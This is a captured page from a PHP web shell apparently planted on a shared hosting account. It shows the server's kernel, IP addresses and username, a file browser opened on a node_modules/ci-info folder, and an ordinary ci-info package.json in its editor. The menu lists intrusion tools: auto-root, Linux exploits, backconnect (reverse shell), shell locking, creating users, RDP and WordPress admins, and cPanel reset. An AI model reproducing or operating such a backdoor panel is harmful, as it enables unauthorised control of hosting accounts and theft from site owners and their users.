Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
ci-info /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
3.05
KB
-rw-r--r--
LICENSE
1.07
KB
-rw-r--r--
README.md
6.51
KB
-rw-r--r--
index.d.ts
2.12
KB
-rw-r--r--
index.js
1.71
KB
-rw-r--r--
package.json
802
B
-rw-r--r--
vendors.json
4.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ci-info", "version": "3.2.0", "description": "Get details about the current Continuous Integration environment", "main": "index.js", "typings": "index.d.ts", "author": "Thomas Watson Steen <w@tson.dk> (https://twitter.com/wa7son)", "license": "MIT", "repository": { "type": "git", "url": "https://github.com/watson/ci-info.git" }, "bugs": { "url": "https://github.com/watson/ci-info/issues" }, "homepage": "https://github.com/watson/ci-info", "keywords": [ "ci", "continuous", "integration", "test", "detect" ], "coordinates": [ 55.778231, 12.593179 ], "scripts": { "test": "standard && node test.js" }, "devDependencies": { "clear-module": "^4.1.1", "standard": "^16.0.3", "tape": "^5.2.2" } }
Close